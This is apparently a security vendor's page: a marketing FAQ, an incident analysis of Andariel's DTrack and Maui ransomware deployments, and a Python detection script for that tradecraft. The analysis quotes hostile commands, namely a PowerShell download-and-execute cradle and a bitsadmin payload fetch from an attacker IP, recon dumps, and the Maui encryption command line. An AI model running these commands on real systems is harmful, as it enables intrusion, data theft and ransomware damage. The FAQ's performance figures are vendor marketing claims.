Frequently Asked Questions

Threats & Incident Analysis

What is the Andariel group and how do they deploy DTrack and Maui ransomware?

The Andariel group is a threat actor known for deploying advanced malware such as DTrack and Maui ransomware. In documented incidents, Andariel used exploits to gain access to vulnerable servers, then deployed DTrack for information gathering and Maui ransomware for file encryption. The malware collects system and network information, exfiltrates data, and encrypts drives using specific command-line parameters. (Source: Original Webpage)

How does DTrack malware operate once deployed?

DTrack executes embedded shellcode to load a Windows in-memory payload, collects system information using Windows commands, and exfiltrates data to remote servers. It also collects browser history and copies stolen files to remote hosts on the same network. (Source: Original Webpage)

What are the technical details of Maui ransomware deployment?

Maui ransomware is deployed with parameters such as '-t' for thread count and '-x' for self-melt, targeting specific drives for encryption. It creates key files to implement file encryption and is often detected shortly after DTrack is deployed. (Source: Original Webpage)

How do attackers use PowerShell and bitsadmin in these incidents?

Attackers use PowerShell commands to download and execute additional scripts from remote servers. The bitsadmin utility is used to fetch and save malicious payloads, such as DTrack, to the victim's system for execution. (Source: Original Webpage)

What vulnerabilities did Andariel exploit to gain access?

Andariel exploited vulnerabilities in HFS (HTTP File Server) and Oracle WebLogic servers, including CVE-2017-10271, to gain initial access and execute malicious scripts. (Source: Original Webpage)

What is the impact of credential theft in these attacks?

Credential theft allows attackers to escalate privileges, deploy malware across networks, exfiltrate data, and potentially compromise additional systems within the organization. (Source: Original Webpage)

How does Cymulate help organizations validate resilience against ransomware like Maui?

Cymulate enables organizations to simulate ransomware attacks, including variants like Maui, to validate the effectiveness of their security controls, identify exploitable exposures, and prioritize remediation. The platform provides continuous threat validation and actionable insights to improve ransomware resilience. (Source: Knowledge Base, https://cymulate.com/solutions/optimize-threat-resilience/)

Where can I find guidance on becoming resilient to ransomware?

Cymulate provides a blog post outlining "7 Essential Steps to Becoming Ransomware Resilient." You can read it on our blog. (Source: Knowledge Base)

What types of cyber threats does the financial services sector face?

The financial services sector is targeted by sophisticated threats such as ransomware, phishing, and advanced persistent threats (APTs). Cymulate helps validate defenses against these threats. (Source: Knowledge Base, https://cymulate.com/customers/financial-services-cybersecurity-validation/)

Platform Features & Capabilities

What is Cymulate's Exposure Management Platform?

Cymulate's Exposure Management Platform is a unified solution that integrates Breach and Attack Simulation (BAS), Continuous Automated Red Teaming (CART), and Exposure Analytics. It enables organizations to proactively validate security controls, prioritize exposures, and improve operational efficiency. (Source: Knowledge Base, https://cymulate.com/platform/)

What types of threats can Cymulate validate?

Cymulate validates threats across the full kill chain, including phishing, malware, lateral movement, data exfiltration, and zero-day exploits, using daily updated threat templates and AI-generated attack plans. (Source: Knowledge Base, https://cymulate.com/solutions/optimize-threat-resilience/)

How does Cymulate's Threat Validation solution differ from manual pen tests and traditional BAS?

Cymulate's Threat Validation provides automated, continuous security testing with a library of over 100,000 attack actions aligned to MITRE ATT&CK and daily threat intelligence. Unlike manual pen tests or traditional BAS, Cymulate offers out-of-the-box integrations, automated mitigation, and actionable remediation. (Source: Knowledge Base)

What is threat exposure prioritization in cybersecurity?

Threat exposure prioritization is the process of identifying and ranking vulnerabilities based on their exploitability and impact on business-critical assets. Cymulate uses automated threat validation and exposure scoring to help teams focus on exposures not protected by security controls. (Source: Knowledge Base, https://cymulate.com/solutions/exposure-prioritization/)

How does Cymulate's 'Threat (IoC) updates' feature improve threat resilience?

The 'Threat (IoC) updates' feature provides recommended Indicators of Compromise (IoCs) that can be exported and applied to security controls, improving threat resilience by enabling rapid defense updates against new threats. (Source: Knowledge Base)

What are the key capabilities and benefits of Cymulate?

Cymulate offers continuous threat validation, unified platform integration, AI-powered optimization, complete kill chain coverage, attack path discovery, automated mitigation, cloud validation, and ease of use. Customers report measurable outcomes such as a 52% reduction in critical exposures, 60% increase in team efficiency, and 81% reduction in cyber risk within four months. (Source: Knowledge Base)

What integrations does Cymulate support?

Cymulate integrates with security technologies such as Akamai Guardicore, AWS GuardDuty, BlackBerry Cylance OPTICS, Carbon Black EDR, Check Point CloudGuard, CrowdStrike Falcon, CrowdStrike Falcon LogScale, and Cybereason. For a full list, visit our Partnerships and Integrations page. (Source: Knowledge Base)

How easy is Cymulate to implement and use?

Cymulate is praised for its intuitive, user-friendly interface and quick deployment. Customers report that implementation is fast, requiring only a few clicks, and the platform provides actionable insights with minimal resources. (Source: Knowledge Base, Customer Testimonials)

Use Cases & Benefits

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams across industries such as financial services, healthcare, retail, and more. It is suitable for organizations of all sizes, from small businesses to large enterprises. (Source: Knowledge Base)

What business impact can customers expect from using Cymulate?

Customers can expect a 30% improvement in threat prevention, 52% reduction in critical exposures, 60% increase in operational efficiency, 40X faster threat validation, 85% improvement in threat detection accuracy, and an 81% reduction in cyber risk within four months. (Source: Knowledge Base, https://cymulate.com/schedule-a-demo/)

What core problems does Cymulate solve for security teams?

Cymulate addresses overwhelming threat volume, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers for CISOs. (Source: Knowledge Base)

How does Cymulate address persona-specific pain points?

Cymulate tailors solutions for CISOs (visibility, metrics), SecOps (efficiency, automation), red teams (scalability, adversarial simulation), and vulnerability management teams (prioritization, resource constraints). (Source: Knowledge Base)

What is the primary purpose of Cymulate's product?

The primary purpose is to harden defenses and optimize security controls by proactively validating controls, threats, and response capabilities, enabling organizations to focus on exploitable exposures and strengthen their security posture. (Source: Knowledge Base)

How does Cymulate support collaboration across security teams?

Cymulate fosters collaboration between SecOps, red teams, and vulnerability management teams by providing a unified platform for exposure validation, prioritization, and remediation. (Source: Knowledge Base)

Security & Compliance

What security and compliance certifications does Cymulate hold?

Cymulate holds SOC2 Type II, ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1 certifications, demonstrating compliance with industry standards for security, privacy, and cloud services. (Source: Knowledge Base, https://cymulate.com/security-at-cymulate/)

How does Cymulate ensure data security and privacy?

Cymulate hosts services in secure AWS data centers, uses encryption for data in transit (TLS 1.2+) and at rest (AES-256), and follows a strict Secure Development Lifecycle (SDLC) with regular audits, vulnerability scanning, and third-party penetration tests. (Source: Knowledge Base)

Is Cymulate compliant with GDPR?

Yes, Cymulate incorporates data protection by design and has a dedicated privacy and security team, including a Data Protection Officer (DPO) and Chief Information Security Officer (CISO), ensuring GDPR compliance. (Source: Knowledge Base)

Competition & Comparison

How does Cymulate compare to AttackIQ?

Cymulate offers an industry-leading threat scenario library and AI-powered capabilities for workflow automation and security posture improvement. AttackIQ focuses on automated security validation but lacks Cymulate's innovation, threat coverage, and ease of use. Read more. (Source: Knowledge Base)

How does Cymulate differ from Mandiant Security Validation?

Mandiant is an original BAS platform but has seen little innovation in recent years. Cymulate continually innovates with AI and automation, expanding into exposure management and recognized as a grid leader. Read more. (Source: Knowledge Base)

What makes Cymulate different from Pentera?

Pentera focuses on attack path validation but lacks Cymulate's depth in defense optimization, offensive testing scalability, and exposure awareness. Cymulate provides a more comprehensive exposure validation platform. Read more. (Source: Knowledge Base)

How does Cymulate compare to Picus Security?

Picus may suit organizations seeking a BAS vendor with an on-prem option. Cymulate offers a more complete exposure validation platform covering the full kill chain and cloud control validation. Read more. (Source: Knowledge Base)

How does Cymulate compare to SafeBreach?

Cymulate outpaces SafeBreach with unmatched innovation, precision, and automation, featuring the industry’s largest attack library and a full CTEM solution. Read more. (Source: Knowledge Base)

How does Cymulate compare to Scythe?

Scythe is suitable for advanced red teams building custom attack campaigns. Cymulate provides a more comprehensive exposure validation platform with actionable remediation and automated mitigation. Read more. (Source: Knowledge Base)

How does Cymulate compare to NetSPI?

NetSPI excels in penetration testing as a service (PTaaS). Cymulate is designed for continuous, independent assessment and strengthening of defenses, recognized as a leader in exposure validation by Gartner and G2. Read more. (Source: Knowledge Base)

Pricing & Plans

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model tailored to each organization's needs. Pricing depends on the chosen package, number of assets, and scenarios selected. For a detailed quote, schedule a demo with Cymulate's team. (Source: Knowledge Base)

Company Information & Trust

When was Cymulate founded and what is its global reach?

Cymulate was founded in 2016 and has a presence in 8 global locations, serving customers in 50 countries. Over 1,000 customers trust Cymulate's platform. (Source: Knowledge Base, https://cymulate.com/about-us/)

What is Cymulate's mission and vision?

Cymulate's mission is to revolutionize how companies approach cybersecurity by fostering a proactive stance against threats, empowering organizations to manage their security posture and improve resilience. (Source: Knowledge Base, https://cymulate.com/about-us/)

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive design, ease of deployment, and actionable insights. Testimonials highlight the platform's user-friendly dashboard, fast implementation, and excellent support. (Source: Knowledge Base, Customer Testimonials)

Andariel deploys DTrack and Maui ransomware

August 11, 2022

Once this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. The malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:

"C:\Windows\system32\cmd.exe" /c ipconfig /all > "%Temp%\temp\res.ip"
"C:\Windows\system32\cmd.exe" /c tasklist > "%Temp%\temp\task.list"
"C:\Windows\system32\cmd.exe" /c netstat -naop tcp > "%Temp%\temp\netstat.res"
"C:\Windows\system32\cmd.exe" /c netsh interface show interface > "%Temp%\temp\netsh.res"
"C:\Windows\system32\cmd.exe" /c ping -n 1 8.8.8.8 > "%Temp%\temp\ping.res"

In addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant also copies stolen files to a remote host on the same network.

The Maui ransomware was detected ten hours after the DTrack variant on the same server. Multiple run parameters exist for the Maui ransomware. In this incident, analysts observed the actors using the "-t" and "-x" arguments, along with a specific drive path to encrypt:

C:\Windows\Temp\temp\bin\Maui.exe -t 8 -x E:

In this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted.

The ransomware functionality is the same as described in the Stairwell report. The malware created two key files to implement file encryption. Pivoting on the exfiltration information to the adjacent hosts, analysts discovered additional victims in India. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts. The primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using a different set of login credentials and a local IP address to exfiltrate data. This DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to Threat Intelligence customers.

In one victim system, analysts discovered that a well-known simple HTTP server, HFS, had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the PowerShell command below was executed to fetch an additional PowerShell script from the remote server:

C:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')

The mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:

bitsadmin.exe /transfer myJob /download /priority high "hxxp://145.232.235[.]222/usr/users/dwem.cert" "%appdata%\microsoft\mmc\dwem.cert"

The other victim operated a vulnerable WebLogic server. According to telemetry, the actor compromised this server via the CVE-2017-10271 exploit. Analysts saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to Threat Intelligence customers. In this case, the exploited server executed the PowerShell command to fetch the additional script. The fetched script is capable of downloading a PowerShell script from the server mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1).
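A defender-side illustration of the tradecraft in the incident write-up above (and of the FAQ entries on DTrack, Maui, PowerShell and bitsadmin): the recon commands redirected into %Temp%, the Maui launch switches, the PowerShell IEX/DownloadString cradle and the bitsadmin transfer into %appdata%. This is an added example, not code from the report, from Cymulate or from any vendor tool. It runs command-line pattern rules over process-creation events; the event schema, host names, parent-image names and timestamps are constructed for the example, while the command lines are the ones quoted in the report (URL kept defanged). The recon rule deliberately requires several distinct tools within a short window, so one admin dumping ipconfig to a temp file does not alert.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. The schema (ts, host, parent, cmdline) is a
    constructed simplification, not any particular product's event format."""
    ts: datetime
    host: str
    parent: str
    cmdline: str


# Recon utilities the in-memory DTrack payload runs via cmd.exe /c, output redirected into %Temp%.
RECON_TOOLS = {"ipconfig", "tasklist", "netstat", "netsh", "ping"}
RECON_RE = re.compile(r'cmd\.exe"?\s+/c\s+(\w+)\b.*>\s*"?%temp%\\', re.I)
# Maui launch switches quoted in the report: -t <thread count> -x <drive>:
MAUI_RE = re.compile(r"\s-t\s+(\d+)\s+-x\s+([A-Za-z]):")
# PowerShell download cradle: IEX (New-Object Net.WebClient).DownloadString(...)
CRADLE_RE = re.compile(r"powershell.*\bIEX\b.*\.DownloadString\(", re.I)
# bitsadmin /transfer ... /download ... with a destination under %appdata%
BITS_RE = re.compile(r'bitsadmin(?:\.exe)?\s+/transfer\b.*/download\b.*"?%appdata%\\', re.I)


def detect(events, window=timedelta(minutes=5), min_distinct=3):
    """Return (host, rule, detail) alerts for the given events.

    The three single-command rules fire per event. The recon rule fires once per
    host, only when at least `min_distinct` different recon tools redirect output
    into %Temp% within `window` of each other.
    """
    alerts = []
    recon_hits = defaultdict(list)  # host -> [(timestamp, tool)], in time order
    for ev in sorted(events, key=lambda e: e.ts):
        m = RECON_RE.search(ev.cmdline)
        if m and m.group(1).lower() in RECON_TOOLS:
            recon_hits[ev.host].append((ev.ts, m.group(1).lower()))
        m = MAUI_RE.search(ev.cmdline)
        if m:
            alerts.append((ev.host, "maui_args",
                           f"threads={m.group(1)} target={m.group(2).upper()}:"))
        if CRADLE_RE.search(ev.cmdline):
            alerts.append((ev.host, "ps_download_cradle", f"parent={ev.parent}"))
        if BITS_RE.search(ev.cmdline):
            alerts.append((ev.host, "bitsadmin_to_appdata", f"parent={ev.parent}"))

    for host, hits in recon_hits.items():
        for i, (t0, _) in enumerate(hits):
            tools = {tool for ts, tool in hits[i:] if ts - t0 <= window}
            if len(tools) >= min_distinct:
                alerts.append((host, "recon_burst_to_temp", ",".join(sorted(tools))))
                break
    return alerts


def rules_fired(alerts, host):
    """Names of the rules that fired for one host."""
    return {rule for h, rule, _ in alerts if h == host}


# Constructed sample: command lines as quoted in the report (URL kept defanged);
# host names, parent images ("hfs.exe", "loader") and timestamps are invented.
T0 = datetime(2022, 8, 1, 10, 0, 0)
CMD = r'"C:\Windows\system32\cmd.exe" /c '
SAMPLE_EVENTS = [
    ProcEvent(T0, "srv-jp", "hfs.exe",
              r"C:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient)"
              r".DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')"),
    ProcEvent(T0 + timedelta(seconds=5), "srv-jp", "powershell.exe",
              r'bitsadmin.exe /transfer myJob /download /priority high '
              r'"hxxp://145.232.235[.]222/usr/users/dwem.cert" "%appdata%\microsoft\mmc\dwem.cert"'),
    ProcEvent(T0 + timedelta(seconds=60), "srv-jp", "loader", CMD + r'ipconfig /all > "%Temp%\temp\res.ip"'),
    ProcEvent(T0 + timedelta(seconds=61), "srv-jp", "loader", CMD + r'tasklist > "%Temp%\temp\task.list"'),
    ProcEvent(T0 + timedelta(seconds=62), "srv-jp", "loader", CMD + r'netstat -naop tcp > "%Temp%\temp\netstat.res"'),
    ProcEvent(T0 + timedelta(seconds=63), "srv-jp", "loader",
              CMD + r'netsh interface show interface > "%Temp%\temp\netsh.res"'),
    ProcEvent(T0 + timedelta(seconds=64), "srv-jp", "loader", CMD + r'ping -n 1 8.8.8.8 > "%Temp%\temp\ping.res"'),
    ProcEvent(T0 + timedelta(hours=10), "srv-jp", "cmd.exe", r"C:\Windows\Temp\temp\bin\Maui.exe -t 8 -x E:"),
    # Benign admin activity on another host: a lone recon dump, a download to Downloads, a bare ping.
    ProcEvent(T0, "ws-admin", "cmd.exe", CMD + r'ipconfig /all > "%Temp%\temp\res.ip"'),
    ProcEvent(T0 + timedelta(minutes=1), "ws-admin", "cmd.exe",
              r'bitsadmin.exe /transfer update /download /priority normal '
              r'"https://example.com/tool.zip" "C:\Users\admin\Downloads\tool.zip"'),
    ProcEvent(T0 + timedelta(minutes=2), "ws-admin", "cmd.exe", r"ping -n 1 8.8.8.8"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run as a script it prints the four alerts for srv-jp and nothing for ws-admin. The per-event rules are the cheap, high-confidence ones (a PowerShell cradle or a bitsadmin transfer into %appdata% is rarely legitimate); the recon rule trades a little latency for precision by correlating several commands per host instead of alerting on any one of them.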